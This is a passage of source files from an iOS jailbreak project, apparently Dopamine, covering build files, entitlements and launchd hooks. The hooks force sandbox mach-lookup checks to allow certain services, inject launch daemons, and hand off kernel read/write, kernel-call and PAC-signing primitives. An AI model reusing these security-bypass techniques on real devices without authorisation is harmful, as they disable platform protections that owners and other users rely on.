RunAtLoad 15 | 16 | StartCalendarInterval 17 | 18 | Hour 19 | 0 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /BaseBin/jbinit/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jbinit 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -I../_shared -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 6 | LDFLAGS = -L../libjailbreak -ljailbreak 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist -Icom.apple.jbinit $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/jbinit/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | get-task-allow 10 | 11 | com.apple.private.security.no-container 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/jbinit/src/launchctl.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #ifndef launchctl_h 4 | #define launchctl_h 5 | 6 | #if defined(__cplusplus) 7 | extern "C" { 8 | #endif 9 | 10 | extern int64_t launchctl_load(const char* plistPath, bool unload); 11 | 12 | #if defined(__cplusplus) 13 | } 14 | #endif 15 | 16 | #endif /* launchctl_h */ -------------------------------------------------------------------------------- /BaseBin/jbinit/src/launchctl.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | #define ROUTINE_LOAD 800 6 | #define ROUTINE_UNLOAD 801 7 | 8 | int64_t launchctl_load(const char* plistPath, bool unload) 9 | { 10 | xpc_object_t pathArray = xpc_array_create_empty(); 11 | xpc_array_set_string(pathArray, XPC_ARRAY_APPEND, plistPath); 12 | 13 | xpc_object_t msgDictionary = xpc_dictionary_create_empty(); 14 | xpc_dictionary_set_uint64(msgDictionary, "subsystem", 3); 15 | xpc_dictionary_set_uint64(msgDictionary, "handle", 0); 16 | xpc_dictionary_set_uint64(msgDictionary, "type", 1); 17 | xpc_dictionary_set_bool(msgDictionary, "legacy-load", true); 18 | xpc_dictionary_set_bool(msgDictionary, "enable", false); 19 | xpc_dictionary_set_uint64(msgDictionary, "routine", unload ? ROUTINE_UNLOAD : ROUTINE_LOAD); 20 | xpc_dictionary_set_value(msgDictionary, "paths", pathArray); 21 | 22 | xpc_object_t msgReply = launchd_xpc_send_message(msgDictionary); 23 | 24 | char *msgReplyDescription = xpc_copy_description(msgReply); 25 | printf("msgReply = %s\n", msgReplyDescription); 26 | free(msgReplyDescription); 27 | 28 | int64_t bootstrapError = xpc_dictionary_get_int64(msgReply, "bootstrap-error"); 29 | if(bootstrapError != 0) 30 | { 31 | printf("bootstrap-error = %s\n", xpc_strerror((int32_t)bootstrapError)); 32 | return bootstrapError; 33 | } 34 | 35 | int64_t error = xpc_dictionary_get_int64(msgReply, "error"); 36 | if(error != 0) 37 | { 38 | printf("error = %s\n", xpc_strerror((int32_t)error)); 39 | return error; 40 | } 41 | 42 | // launchctl seems to do extra things here 43 | // like getting the audit token via xpc_dictionary_get_audit_token 44 | // or sometimes also getting msgReply["req_pid"] and msgReply["rec_execcnt"] 45 | // but we don't really care about that here 46 | 47 | return 0; 48 | } 49 | -------------------------------------------------------------------------------- /BaseBin/jbinit/src/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import "launchctl.h" 5 | 6 | int main(int argc, char* argv[]) 7 | { 8 | NSString *idownloaddEnabledPath = prebootPath(@"basebin/LaunchDaemons/com.opa334.idownloadd.plist"); 9 | NSString *idownloaddDisabledPath = prebootPath(@"basebin/LaunchDaemons/Disabled/com.opa334.idownloadd.plist"); 10 | if (argc == 2) { 11 | char *cmd = argv[1]; 12 | if (!strcmp(cmd, "start_idownload")) { 13 | if ([[NSFileManager defaultManager] fileExistsAtPath:idownloaddDisabledPath]) { 14 | [[NSFileManager defaultManager] moveItemAtPath:idownloaddDisabledPath toPath:idownloaddEnabledPath error:nil]; 15 | launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, false); 16 | } 17 | return 0; 18 | } 19 | else if (!strcmp(cmd, "stop_idownload")) { 20 | if ([[NSFileManager defaultManager] fileExistsAtPath:idownloaddEnabledPath]) { 21 | launchctl_load(idownloaddEnabledPath.fileSystemRepresentation, true); 22 | [[NSFileManager defaultManager] moveItemAtPath:idownloaddEnabledPath toPath:idownloaddDisabledPath error:nil]; 23 | } 24 | return 0; 25 | } 26 | } 27 | launchctl_load(prebootPath(@"basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation, false); 28 | launchctl_load(prebootPath(@"basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation, false); 29 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = launchdhook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2 5 | LDFLAGS = -dynamiclib -rpath @loader_path/fallback -L../libjailbreak -L../_shared -ljailbreak -lellekit -lbsm -L../libfilecom -lfilecom 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.m ../systemhook/src/common.c ../systemhook/src/envbuf.c) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 13 | install_name_tool -change "/var/jb/basebin/libfilecom.dylib" "@loader_path/libfilecom.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/boomerang.h: -------------------------------------------------------------------------------- 1 | void boomerang_userspaceRebootIncoming(); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/boomerang.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | 8 | extern int (*posix_spawn_orig)(pid_t *restrict, const char *restrict, const posix_spawn_file_actions_t *restrict, const posix_spawnattr_t *restrict, char *const[restrict], char *const[restrict]); 9 | 10 | void boomerang_userspaceRebootIncoming() 11 | { 12 | // Fix Xcode debugging being broken after the userspace reboot 13 | unmount("/Developer", MNT_FORCE); 14 | 15 | pid_t boomerangPid = 0; 16 | 17 | // Wait until boomerang process has initialized primitives 18 | dispatch_semaphore_t sema = dispatch_semaphore_create(0); 19 | FCHandler *handler = [[FCHandler alloc] initWithReceiveFilePath:prebootPath(@"basebin/.communication/boomerang_to_launchd") sendFilePath:prebootPath(@"basebin/.communication/launchd_to_boomerang")]; 20 | __weak FCHandler *weakHandler = handler; 21 | handler.receiveHandler = ^(NSDictionary *message) { 22 | NSString *identifier = message[@"id"]; 23 | if (identifier) { 24 | if ([identifier isEqualToString:@"getPPLRW"]) { 25 | pid_t pid = [(NSNumber *)message[@"pid"] intValue]; 26 | int ret = handoffPPLPrimitives(pid); 27 | [weakHandler sendMessage:@{@"id" : @"receivePPLRW", @"errCode" : @(ret)}]; 28 | } 29 | else if ([identifier isEqualToString:@"signThreadState"]) { 30 | uint64_t actContextKptr = [(NSNumber*)message[@"actContext"] unsignedLongLongValue]; 31 | signState(actContextKptr); 32 | [weakHandler sendMessage:@{@"id" : @"signedThreadState"}]; 33 | } 34 | else if ([identifier isEqualToString:@"primitivesInitialized"]) 35 | { 36 | dispatch_semaphore_signal(sema); // DONE, exit 37 | } 38 | } 39 | }; 40 | 41 | int ret = posix_spawn_orig(&boomerangPid, prebootPath(@"basebin/boomerang").fileSystemRepresentation, NULL, NULL, NULL, NULL); 42 | if (ret != 0) return; 43 | 44 | dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER); 45 | } 46 | -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/crashreporter.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | typedef int exception_type_t; 4 | typedef integer_t exception_data_type_t; 5 | 6 | typedef struct { 7 | mach_msg_header_t header; 8 | mach_msg_body_t msgh_body; 9 | mach_msg_port_descriptor_t thread; 10 | mach_msg_port_descriptor_t task; 11 | int unused1; 12 | exception_type_t exception; 13 | exception_data_type_t code; 14 | int unused2; 15 | int subcode; 16 | NDR_record_t ndr; 17 | } exception_raise_request; // the bits we need at least 18 | 19 | typedef struct { 20 | mach_msg_header_t header; 21 | NDR_record_t ndr; 22 | kern_return_t retcode; 23 | } exception_raise_reply; 24 | 25 | typedef struct { 26 | mach_msg_header_t header; 27 | NDR_record_t ndr; 28 | kern_return_t retcode; 29 | int flavor; 30 | mach_msg_type_number_t new_stateCnt; 31 | natural_t new_state[614]; 32 | } exception_raise_state_reply; 33 | 34 | typedef enum { 35 | kCrashReporterStateNotActive = 0, 36 | kCrashReporterStateActive = 1, 37 | kCrashReporterStatePaused = 2 38 | } crash_reporter_state; 39 | 40 | void crashreporter_start(void); 41 | void crashreporter_pause(void); 42 | void crashreporter_resume(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/daemon_hook.h: -------------------------------------------------------------------------------- 1 | void initDaemonHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/daemon_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import "substrate.h" 6 | #import 7 | #import 8 | #import 9 | #import 10 | 11 | extern xpc_object_t xpc_create_from_plist(const void *buf, size_t len); 12 | 13 | void xpc_dictionary_add_launch_daemon_plist_at_path(xpc_object_t xdict, const char *path) 14 | { 15 | int ldFd = open(path, O_RDONLY); 16 | if (ldFd >= 0) { 17 | struct stat s = {}; 18 | if(fstat(ldFd, &s) != 0) { 19 | close(ldFd); 20 | return; 21 | } 22 | size_t len = s.st_size; 23 | void *addr = mmap(NULL, len, PROT_READ, MAP_FILE | MAP_PRIVATE, ldFd, 0); 24 | if (addr != MAP_FAILED) { 25 | xpc_object_t daemonXdict = xpc_create_from_plist(addr, len); 26 | if (daemonXdict) { 27 | xpc_dictionary_set_value(xdict, path, daemonXdict); 28 | } 29 | munmap(addr, len); 30 | } 31 | close(ldFd); 32 | } 33 | } 34 | 35 | xpc_object_t (*xpc_dictionary_get_value_orig)(xpc_object_t xdict, const char *key); 36 | xpc_object_t xpc_dictionary_get_value_hook(xpc_object_t xdict, const char *key) 37 | { 38 | xpc_object_t origXdict = xpc_dictionary_get_value_orig(xdict, key); 39 | if (!strcmp(key, "LaunchDaemons")) { 40 | xpc_dictionary_add_launch_daemon_plist_at_path(origXdict, prebootPath(@"basebin/LaunchDaemons/com.opa334.jailbreakd.plist").fileSystemRepresentation); 41 | xpc_dictionary_add_launch_daemon_plist_at_path(origXdict, prebootPath(@"basebin/LaunchDaemons/com.opa334.trustcache_rebuild.plist").fileSystemRepresentation); 42 | for (NSString *daemonPlistName in [[NSFileManager defaultManager] contentsOfDirectoryAtPath:prebootPath(@"Library/LaunchDaemons") error:nil]) { 43 | if ([daemonPlistName.pathExtension isEqualToString:@"plist"]) { 44 | xpc_dictionary_add_launch_daemon_plist_at_path(origXdict, [prebootPath(@"Library/LaunchDaemons") stringByAppendingPathComponent:daemonPlistName].fileSystemRepresentation); 45 | } 46 | } 47 | } 48 | else if (!strcmp(key, "Paths")) { 49 | xpc_array_set_string(origXdict, XPC_ARRAY_APPEND, prebootPath(@"basebin/LaunchDaemons").fileSystemRepresentation); 50 | xpc_array_set_string(origXdict, XPC_ARRAY_APPEND, prebootPath(@"Library/LaunchDaemons").fileSystemRepresentation); 51 | } 52 | return origXdict; 53 | } 54 | 55 | void initDaemonHooks(void) 56 | { 57 | MSHookFunction(&xpc_dictionary_get_value, (void *)xpc_dictionary_get_value_hook, (void **)&xpc_dictionary_get_value_orig); 58 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/dsc_hook.h: -------------------------------------------------------------------------------- 1 | void initDSCHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/dsc_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import "substrate.h" 4 | 5 | int (*sysctlbyname_orig)(const char *name, void *oldp, size_t *oldlenp, void *newp, size_t newlen); 6 | int sysctlbyname_hook(const char *name, void *oldp, size_t *oldlenp, void *newp, size_t newlen) 7 | { 8 | if (!strcmp(name, "vm.shared_region_pivot")) { 9 | return 0; 10 | } 11 | return sysctlbyname_orig(name, oldp, oldlenp, newp, newlen); 12 | } 13 | 14 | void initDSCHooks(void) 15 | { 16 | MSHookFunction(sysctlbyname, (void *)sysctlbyname_hook, (void **)&sysctlbyname_orig); 17 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/ipc_hook.h: -------------------------------------------------------------------------------- 1 | void initIPCHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/ipc_hook.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import "substrate.h" 4 | 5 | int (*sandbox_check_by_audit_token_orig)(audit_token_t au, const char *operation, int sandbox_filter_type, ...); 6 | int sandbox_check_by_audit_token_hook(audit_token_t au, const char *operation, int sandbox_filter_type, ...) 7 | { 8 | va_list a; 9 | va_start(a, sandbox_filter_type); 10 | const char *name = va_arg(a, const char *); 11 | const void *arg2 = va_arg(a, void *); 12 | const void *arg3 = va_arg(a, void *); 13 | const void *arg4 = va_arg(a, void *); 14 | const void *arg5 = va_arg(a, void *); 15 | const void *arg6 = va_arg(a, void *); 16 | const void *arg7 = va_arg(a, void *); 17 | const void *arg8 = va_arg(a, void *); 18 | const void *arg9 = va_arg(a, void *); 19 | const void *arg10 = va_arg(a, void *); 20 | va_end(a); 21 | if (name && operation) { 22 | if (strcmp(operation, "mach-lookup") == 0) { 23 | if (strncmp((char *)name, "cy:", 3) == 0 || strncmp((char *)name, "lh:", 3) == 0) { 24 | /* always allow */ 25 | return 0; 26 | } 27 | } 28 | } 29 | return sandbox_check_by_audit_token_orig(au, operation, sandbox_filter_type, name, arg2, arg3, arg4, arg5, arg6, arg7, arg8, arg9, arg10); 30 | } 31 | 32 | void initIPCHooks(void) 33 | { 34 | MSHookFunction(&sandbox_check_by_audit_token, (void *)sandbox_check_by_audit_token_hook, (void **)&sandbox_check_by_audit_token_orig); 35 | } -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/spawn_hook.h: -------------------------------------------------------------------------------- 1 | void initSpawnHooks(void); -------------------------------------------------------------------------------- /BaseBin/launchdhook/src/xpc_hook.h: -------------------------------------------------------------------------------- 1 | void initXPCHooks(void); -------------------------------------------------------------------------------- /BaseBin/libfilecom/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = libfilecom.dylib 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name /var/jb/basebin/$(TARGET) -O2 6 | 7 | sign: $(TARGET) 8 | @ldid -S $< 9 | 10 | $(TARGET): $(wildcard src/*.m) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/libfilecom/src/FCHandler.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface FCHandler : NSObject 4 | { 5 | NSString *_receiveFilePath; 6 | NSString *_sendFilePath; 7 | int _receiveFd; 8 | dispatch_source_t _dispatchSource; 9 | dispatch_queue_t _sendQueue; 10 | dispatch_queue_t _receiveQueue; 11 | BOOL _ignoreIncoming; 12 | } 13 | 14 | @property (nonatomic, copy) void (^receiveHandler)(NSDictionary *); 15 | 16 | - (instancetype)initWithReceiveFilePath:(NSString *)receiveFilePath sendFilePath:(NSString *)sendFilePath; 17 | 18 | - (BOOL)sendMessage:(NSDictionary *)message; 19 | - (void)receivedMessage:(NSDictionary *)message; 20 | 21 | 22 | @end -------------------------------------------------------------------------------- /BaseBin/libintl.8.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/libintl.8.dylib -------------------------------------------------------------------------------- /BaseBin/libjailbreak/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = libjailbreak.dylib 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -framework IOKit -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -dynamiclib -install_name /var/jb/basebin/$(TARGET) -O3 6 | LDFLAGS = -lbsm -L../libfilecom -lfilecom 7 | 8 | sign: $(TARGET) 9 | @ldid -S $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.c src/*.S) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libfilecom.dylib" "@loader_path/libfilecom.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/boot_info.h: -------------------------------------------------------------------------------- 1 | __kindof NSObject *bootInfo_getObject(NSString *name); 2 | void bootInfo_setObject(NSString *name, __kindof NSObject *object); 3 | 4 | uint64_t bootInfo_getUInt64(NSString *name); 5 | uint64_t bootInfo_getSlidUInt64(NSString *name); 6 | NSData *bootInfo_getData(NSString *name); 7 | NSArray *bootInfo_getArray(NSString *name); 8 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/boot_info.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import "util.h" 3 | 4 | #define BOOT_INFO_PATH prebootPath(@"basebin/boot_info.plist") 5 | 6 | void bootInfo_setObject(NSString *name, __kindof NSObject *object) 7 | { 8 | NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO]; 9 | NSMutableDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil].mutableCopy ?: [NSMutableDictionary new]; 10 | if (object) { 11 | bootInfo[name] = object; 12 | } 13 | else { 14 | [bootInfo removeObjectForKey:name]; 15 | } 16 | [bootInfo writeToURL:bootInfoURL atomically:YES]; 17 | } 18 | 19 | __kindof NSObject *bootInfo_getObject(NSString *name) 20 | { 21 | NSURL *bootInfoURL = [NSURL fileURLWithPath:BOOT_INFO_PATH isDirectory:NO]; 22 | NSDictionary *bootInfo = [NSDictionary dictionaryWithContentsOfURL:bootInfoURL error:nil]; 23 | return bootInfo[name]; 24 | } 25 | 26 | uint64_t bootInfo_getUInt64(NSString *name) 27 | { 28 | NSNumber* num = bootInfo_getObject(name); 29 | if ([num isKindOfClass:NSNumber.class]) 30 | { 31 | return num.unsignedLongLongValue; 32 | } 33 | return 0; 34 | } 35 | 36 | uint64_t bootInfo_getSlidUInt64(NSString *name) 37 | { 38 | uint64_t kernelslide = bootInfo_getUInt64(@"kernelslide"); 39 | return bootInfo_getUInt64(name) + kernelslide; 40 | } 41 | 42 | NSData *bootInfo_getData(NSString *name) 43 | { 44 | NSData* data = bootInfo_getObject(name); 45 | if ([data isKindOfClass:NSData.class]) 46 | { 47 | return data; 48 | } 49 | return nil; 50 | } 51 | 52 | NSArray *bootInfo_getArray(NSString *name) 53 | { 54 | NSArray* array = bootInfo_getObject(name); 55 | if ([array isKindOfClass:NSArray.class]) 56 | { 57 | return array; 58 | } 59 | return nil; 60 | } -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/handoff.h: -------------------------------------------------------------------------------- 1 | int handoffPPLPrimitives(pid_t pid); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/jailbreakd.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | typedef enum { 5 | JBD_MSG_GET_STATUS = 0, 6 | JBD_MSG_PPL_INIT = 1, 7 | JBD_MSG_PAC_INIT = 2, 8 | JBD_MSG_PAC_FINALIZE = 3, 9 | 10 | JBD_MSG_HANDOFF_PPL = 10, 11 | JBD_MSG_DO_KCALL = 11, 12 | JBD_MSG_DO_KCALL_THREADSTATE = 12, 13 | JBD_MSG_INIT_ENVIRONMENT = 13, 14 | JBD_MSG_JBUPDATE = 14, 15 | 16 | JBD_MSG_REBUILD_TRUSTCACHE = 20, 17 | JBD_MSG_SETUID_FIX = 21, 18 | JBD_MSG_PROCESS_BINARY = 22, 19 | JBD_MSG_PROC_SET_DEBUGGED = 23, 20 | JBD_MSG_DEBUG_ME = 24, 21 | JBD_MSG_FORK_FIX = 25, 22 | JBD_MSG_INTERCEPT_USERSPACE_PANIC = 26, 23 | 24 | JBD_SET_FAKELIB_VISIBLE = 30, 25 | 26 | JBD_BINDMOUNT_PATH = 101, 27 | JBD_BINDUNMOUNT_PATH = 102, 28 | } JBD_MESSAGE_ID; 29 | 30 | typedef enum { 31 | JBD_ERR_PRIMITIVE_NOT_INITIALIZED = 0, 32 | JBD_ERR_NOT_PERMITTED = 1, 33 | } JBD_ERR_ID; 34 | 35 | typedef struct { 36 | uint64_t x[29]; 37 | uint64_t lr; 38 | uint64_t sp; 39 | uint64_t pc; 40 | } KcallThreadState; 41 | 42 | extern bool gIsJailbreakd; 43 | 44 | uint64_t jbdParseNumUInt64(NSNumber *num); 45 | uint64_t jbdParseNumInt64(NSNumber *num); 46 | bool jbdParseBool(NSNumber *num); 47 | 48 | mach_port_t jbdMachPort(void); 49 | xpc_object_t sendJBDMessage(xpc_object_t message); 50 | 51 | void jbdGetStatus(uint64_t *PPLRWStatus, uint64_t *kcallStatus, pid_t *pid); 52 | void jbdTransferPPLRW(void); 53 | uint64_t jbdTransferKcall(); 54 | void jbdFinalizeKcall(void); 55 | 56 | uint64_t jbdGetPPLRWPage(int64_t *errOut); 57 | int jbdInitPPLRW(void); 58 | uint64_t jbdKcallThreadState(KcallThreadState *threadState, bool raw); 59 | uint64_t jbdKcall(uint64_t func, uint64_t argc, const uint64_t *argv); 60 | uint64_t jbdKcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, 61 | uint64_t a6, uint64_t a7, uint64_t a8); 62 | int64_t jbdInitEnvironment(void); 63 | 64 | int64_t jbdUpdateFromTIPA(NSString *pathToTIPA, bool rebootWhenDone); 65 | int64_t jbdUpdateFromBasebinTar(NSString *pathToBasebinTar, bool rebootWhenDone); 66 | 67 | int64_t jbdRebuildTrustCache(void); 68 | int64_t jbdProcessBinary(const char *filePath); 69 | int64_t jbdProcSetDebugged(pid_t pid); 70 | 71 | int64_t jbdBindMountPath(NSString *source, bool check_existances); 72 | int64_t jbdBindUnmountPath(NSString *source); 73 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/kcall.h: -------------------------------------------------------------------------------- 1 | #import 2 | #import "jailbreakd.h" 3 | 4 | typedef enum { 5 | kKcallStatusNotInitialized = 0, 6 | kKcallStatusPrepared = 1, 7 | kKcallStatusFinalized = 2 8 | } KcallStatus; 9 | 10 | typedef struct { 11 | uint64_t unk; 12 | uint64_t x[29]; 13 | uint64_t fp; 14 | uint64_t lr; 15 | uint64_t sp; 16 | uint64_t pc; 17 | uint32_t cpsr; 18 | // Other stuff 19 | uint64_t other[70]; 20 | } kRegisterState; 21 | 22 | extern KcallStatus gKCallStatus; 23 | 24 | void pac_loop(void); 25 | 26 | uint64_t kcall(uint64_t func, uint64_t argc, const uint64_t *argv); 27 | uint64_t kcall8(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 28 | uint64_t kcall_with_raw_thread_state(KcallThreadState threadState); 29 | uint64_t kcall_with_thread_state(KcallThreadState threadState); 30 | uint64_t initPACPrimitives(uint64_t kernelAllocation); 31 | void finalizePACPrimitives(void); 32 | int signState(uint64_t actContext); 33 | int recoverPACPrimitives(); 34 | void destroyPACPrimitives(void); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/launchd.h: -------------------------------------------------------------------------------- 1 | #import 2 | xpc_object_t launchd_xpc_send_message(xpc_object_t xdict); 3 | 4 | typedef enum { 5 | LAUNCHD_JB_MSG_ID_GET_PPLRW, 6 | LAUNCHD_JB_MSG_ID_SIGN_STATE 7 | } LAUNCHD_JB_MSG; 8 | 9 | void patchBaseBinLaunchDaemonPlist(NSString *plistPath); 10 | void patchBaseBinLaunchDaemonPlists(void); -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/launchd.m: -------------------------------------------------------------------------------- 1 | #import "launchd.h" 2 | #import "util.h" 3 | 4 | #define OS_ALLOC_ONCE_KEY_MAX 100 5 | 6 | struct _os_alloc_once_s { 7 | long once; 8 | void *ptr; 9 | }; 10 | 11 | struct xpc_global_data { 12 | uint64_t a; 13 | uint64_t xpc_flags; 14 | mach_port_t task_bootstrap_port; /* 0x10 */ 15 | #ifndef _64 16 | uint32_t padding; 17 | #endif 18 | xpc_object_t xpc_bootstrap_pipe; /* 0x18 */ 19 | // and there's more, but you'll have to wait for MOXiI 2 for those... 20 | // ... 21 | }; 22 | 23 | extern struct _os_alloc_once_s _os_alloc_once_table[]; 24 | extern void* _os_alloc_once(struct _os_alloc_once_s *slot, size_t sz, os_function_t init); 25 | 26 | xpc_object_t launchd_xpc_send_message(xpc_object_t xdict) 27 | { 28 | void* pipePtr = NULL; 29 | 30 | if(_os_alloc_once_table[1].once == -1) 31 | { 32 | pipePtr = _os_alloc_once_table[1].ptr; 33 | } 34 | else 35 | { 36 | pipePtr = _os_alloc_once(&_os_alloc_once_table[1], 472, NULL); 37 | if (!pipePtr) _os_alloc_once_table[1].once = -1; 38 | } 39 | 40 | xpc_object_t xreply = nil; 41 | if (pipePtr) { 42 | struct xpc_global_data* globalData = pipePtr; 43 | xpc_object_t pipe = globalData->xpc_bootstrap_pipe; 44 | if (pipe) { 45 | int err = xpc_pipe_routine_with_flags(pipe, xdict, &xreply, 0); 46 | if (err != 0) { 47 | return nil; 48 | } 49 | } 50 | } 51 | return xreply; 52 | } 53 | 54 | void patchBaseBinLaunchDaemonPlist(NSString *plistPath) 55 | { 56 | NSMutableDictionary *plistDict = [NSMutableDictionary dictionaryWithContentsOfFile:plistPath]; 57 | if (plistDict) { 58 | NSMutableArray *programArguments = ((NSArray *)plistDict[@"ProgramArguments"]).mutableCopy; 59 | if (programArguments.count >= 1) { 60 | NSString *pathBefore = programArguments[0]; 61 | if (![pathBefore hasPrefix:@"/private/preboot"]) { 62 | programArguments[0] = prebootPath(pathBefore); 63 | plistDict[@"ProgramArguments"] = programArguments.copy; 64 | [plistDict writeToFile:plistPath atomically:YES]; 65 | } 66 | } 67 | } 68 | } 69 | 70 | void patchBaseBinLaunchDaemonPlists(void) 71 | { 72 | NSURL *launchDaemonURL = [NSURL fileURLWithPath:prebootPath(@"basebin/LaunchDaemons") isDirectory:YES]; 73 | NSArray *launchDaemonPlistURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:launchDaemonURL includingPropertiesForKeys:nil options:0 error:nil]; 74 | for (NSURL *launchDaemonPlistURL in launchDaemonPlistURLs) { 75 | patchBaseBinLaunchDaemonPlist(launchDaemonPlistURL.path); 76 | } 77 | 78 | NSURL *disabledLaunchDaemonURL = [NSURL fileURLWithPath:prebootPath(@"basebin/LaunchDaemons/Disabled") isDirectory:YES]; 79 | NSArray *disabledLaunchDaemonPlistURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:disabledLaunchDaemonURL includingPropertiesForKeys:nil options:0 error:nil]; 80 | for (NSURL *disabledLaunchDaemonPlistURL in disabledLaunchDaemonPlistURLs) { 81 | patchBaseBinLaunchDaemonPlist(disabledLaunchDaemonPlistURL.path); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/libjailbreak.h: -------------------------------------------------------------------------------- 1 | #import "boot_info.h" 2 | #import "handoff.h" 3 | #import "jailbreakd.h" 4 | #import "pplrw.h" 5 | #import "pte.h" 6 | #import "kcall.h" 7 | #import "util.h" 8 | #import "log.h" -------------------------------------------------------------------------------- /BaseBin/libjailbreak/src/log.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | bool debugLogsEnabled = false; 8 | bool errorLogsEnabled = false; 9 | #define LOGGING_PATH "/var/log/" 10 | 11 | const char *JBLogGetProcessName(void) 12 | { 13 | static char *processName = NULL; 14 | static dispatch_once_t onceToken; 15 | dispatch_once (&onceToken, ^{ 16 | uint32_t length = 0; 17 | _NSGetExecutablePath(NULL, &length); 18 | char *buf = malloc(length); 19 | _NSGetExecutablePath(buf, &length); 20 | 21 | char delim[] = "/"; 22 | char *last = NULL; 23 | char *ptr = strtok(buf, delim); 24 | while(ptr != NULL) 25 | { 26 | last = ptr; 27 | ptr = strtok(NULL, delim); 28 | } 29 | processName = strdup(last); 30 | free(buf); 31 | }); 32 | return processName; 33 | } 34 | 35 | 36 | void JBDLogV(const char* prefix, const char *format, va_list va) 37 | { 38 | static char *logFilePath = NULL; 39 | static dispatch_once_t onceToken; 40 | dispatch_once (&onceToken, ^{ 41 | const char *processName = JBLogGetProcessName(); 42 | 43 | time_t t = time(NULL); 44 | struct tm *tm = localtime(&t); 45 | char timestamp[64]; 46 | sprintf(×tamp[0], "%lu", t); 47 